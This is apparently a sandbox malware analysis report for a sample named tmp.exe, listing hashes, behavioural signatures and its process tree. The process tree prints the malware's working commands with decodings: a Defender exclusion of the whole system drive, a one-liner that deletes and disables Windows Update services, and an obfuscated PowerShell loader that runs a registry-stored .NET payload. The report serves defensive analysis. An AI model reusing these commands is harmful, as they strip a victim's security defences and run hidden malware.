Analysis
- max time kernel: 14s
- max time network: 30s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-09-2022 05:41
- Static task: static1
- Behavioral task: behavioral1
- Sample: tmp.exe
- Resource: win7-20220901-en
General
- Target: tmp.exe
- Size: 4.5MB
- MD5: b7c12ce33a5c2de80bcd7083d839df6e
- SHA1: 6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
- SHA256: 65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
- SHA512: b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
- SSDEEP: 98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx
Malware Config
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  Processes: reg.exe
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe

- Possible privilege escalation attempt (2 IoCs)
  Processes: takeown.exe, icacls.exe
  pid | process
  4616 | takeown.exe
  216 | icacls.exe

- Stops running service(s) (3 TTPs)

- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: tmp.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | tmp.exe

- Modifies file permissions (1 TTPs, 2 IoCs)
  Processes: takeown.exe, icacls.exe
  pid | process
  4616 | takeown.exe
  216 | icacls.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  2 | ip-api.com

- Suspicious use of SetThreadContext (1 IoCs)
  Processes: tmp.exe
  description | pid | process | target process
  PID 3844 set thread context of 1304 | 3844 | tmp.exe | conhost.exe

- Drops file in Windows directory (4 IoCs)
  Processes: conhost.exe
  description | ioc | process
  File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
- Launches sc.exe (5 IoCs)
  sc.exe is a Windows utility to control services on the system.
  Processes: sc.exe (5 instances)
  pid | process
  2160 | sc.exe
  3212 | sc.exe
  1908 | sc.exe
  4008 | sc.exe
  3988 | sc.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Modifies registry key (1 TTPs, 9 IoCs)
  Processes: reg.exe (9 instances)
  pid | process
  2988 | reg.exe
  3936 | reg.exe
  4716 | reg.exe
  4404 | reg.exe
  4152 | reg.exe
  5068 | reg.exe
  3548 | reg.exe
  1284 | reg.exe
  1740 | reg.exe

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, tmp.exe, powershell.exe
  pid | process
  3388 | powershell.exe
  3388 | powershell.exe
  3844 | tmp.exe
  4952 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (12 IoCs)
  Processes: powershell.exe, tmp.exe, powercfg.exe (4 instances), takeown.exe, powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 3388 | powershell.exe
  Token: SeDebugPrivilege | 3844 | tmp.exe
  Token: SeShutdownPrivilege | 4112 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4112 | powercfg.exe
  Token: SeShutdownPrivilege | 2116 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2116 | powercfg.exe
  Token: SeShutdownPrivilege | 3756 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 3756 | powercfg.exe
  Token: SeShutdownPrivilege | 1996 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 1996 | powercfg.exe
  Token: SeTakeOwnershipPrivilege | 4616 | takeown.exe
  Token: SeDebugPrivilege | 4952 | powershell.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: tmp.exe, cmd.exe, cmd.exe
  Each row below is one source/target pair; the events column gives how many WriteProcessMemory events the sandbox recorded for that pair.
  source pid | source process | target pid | target process | events
  3844 | tmp.exe | 3388 | powershell.exe | 2
  3844 | tmp.exe | 2228 | cmd.exe | 2
  3844 | tmp.exe | 2800 | cmd.exe | 2
  2228 | cmd.exe | 2160 | sc.exe | 2
  2800 | cmd.exe | 4112 | powercfg.exe | 2
  2228 | cmd.exe | 3212 | sc.exe | 2
  2800 | cmd.exe | 2116 | powercfg.exe | 2
  2228 | cmd.exe | 1908 | sc.exe | 2
  2228 | cmd.exe | 4008 | sc.exe | 2
  2800 | cmd.exe | 3756 | powercfg.exe | 2
  2228 | cmd.exe | 3988 | sc.exe | 2
  2800 | cmd.exe | 1996 | powercfg.exe | 2
  2228 | cmd.exe | 3936 | reg.exe | 2
  2228 | cmd.exe | 4716 | reg.exe | 2
  2228 | cmd.exe | 4404 | reg.exe | 2
  2228 | cmd.exe | 5068 | reg.exe | 2
  2228 | cmd.exe | 4152 | reg.exe | 2
  2228 | cmd.exe | 4616 | takeown.exe | 2
  2228 | cmd.exe | 216 | icacls.exe | 2
  2228 | cmd.exe | 3548 | reg.exe | 2
  2228 | cmd.exe | 1284 | reg.exe | 2
  2228 | cmd.exe | 1740 | reg.exe | 2
  2228 | cmd.exe | 2988 | reg.exe | 2
  2228 | cmd.exe | 1172 | schtasks.exe | 2
  2228 | cmd.exe | 1840 | schtasks.exe | 2
  2228 | cmd.exe | 2420 | schtasks.exe | 2
  2228 | cmd.exe | 2404 | schtasks.exe | 2
  2228 | cmd.exe | 4868 | schtasks.exe | 2
  2228 | cmd.exe | 4432 | schtasks.exe | 2
  2228 | cmd.exe | 3040 | schtasks.exe | 2
  3844 | tmp.exe | 1304 | conhost.exe | 4
Processes
The number in brackets is the depth of the process in the tree; children are indented under their parent. The "Decoded" lines are the editor's decoding of the encoded or obfuscated PowerShell command line shown directly above them (UTF-16LE base64 for -EncodedCommand; string-format reassembly for the obfuscated one).

[1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"
        Decoded: <#kbrl#> Add-MpPreference <#mu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#oxb#> -Force <#uiww#>  (adds the user profile and the whole system drive to the Defender exclusion list; the <#...#> tokens are empty block comments used as padding)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        (This one-liner stops and deletes the Windows Update, update-medic, BITS and delivery-optimization services, takes ownership of and renames WaaSMedicSvc.dll so the medic service cannot restore them, sets update policy keys to disable automatic updates, and disables the update-related scheduled tasks.)
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\sc.exe
            Command line: sc stop UsoSvc
            - Launches sc.exe

        [3] C:\Windows\system32\sc.exe
            Command line: sc stop WaaSMedicSvc
            - Launches sc.exe

        [3] C:\Windows\system32\sc.exe
            Command line: sc stop wuauserv
            - Launches sc.exe

        [3] C:\Windows\system32\sc.exe
            Command line: sc stop bits
            - Launches sc.exe

        [3] C:\Windows\system32\sc.exe
            Command line: sc stop dosvc
            - Launches sc.exe

        [3] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            - Modifies security service
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            - Modifies registry key

        [3] C:\Windows\system32\takeown.exe
            Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\icacls.exe
            Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            - Possible privilege escalation attempt
            - Modifies file permissions

        [3] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            - Modifies registry key

        [3] C:\Windows\system32\reg.exe
            Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            - Modifies registry key

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        (Disables hibernation and standby timeouts on AC and battery so the host never sleeps.)
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\powercfg.exe
            Command line: powercfg /x -hibernate-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\powercfg.exe
            Command line: powercfg /x -hibernate-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\powercfg.exe
            Command line: powercfg /x -standby-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\powercfg.exe
            Command line: powercfg /x -standby-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\System32\conhost.exe
        Command line: C:\Windows\System32\conhost.exe
        (Target of the SetThreadContext / WriteProcessMemory activity from tmp.exe; this is the process that writes the dialersvc32.job and dialersvc64.job task files.)
        - Drops file in Windows directory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    Decoded: Set-Variable 6To ([type]'Reflection.Assembly'); $Dlr4S = [type]'Microsoft.Win32.Registry'; [Reflection.Assembly]::Load((Get-Item variable:Dlr4S).Value::LocalMachine.OpenSubKey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($null,$null)  (loads a .NET assembly stored as the registry value HKLM\SOFTWARE\dialerstager and runs its entry point, i.e. a fileless, registry-resident second stage)

[1] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    Decoded: same script as the 64-bit instance above, run from the 32-bit (SysWOW64) PowerShell host; the two match the dialersvc64.job / dialersvc32.job task files dropped by conhost.exe.

[1] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{6c518598-23a0-455c-a0f3-878b0a2f6618}

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGUAcwBsACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBxAGUAIwA+AA=="
    Decoded: <#esl#> Start-Process -FilePath 'C:\Program Files\Google\Chrome\updater.exe' -Verb RunAs <#qe#>  (launches an executable masquerading as a Chrome updater with an elevation prompt)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 59d97011e091004eaffb9816aa0b9abd
  SHA1: 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
  SHA256: 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
  SHA512: d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6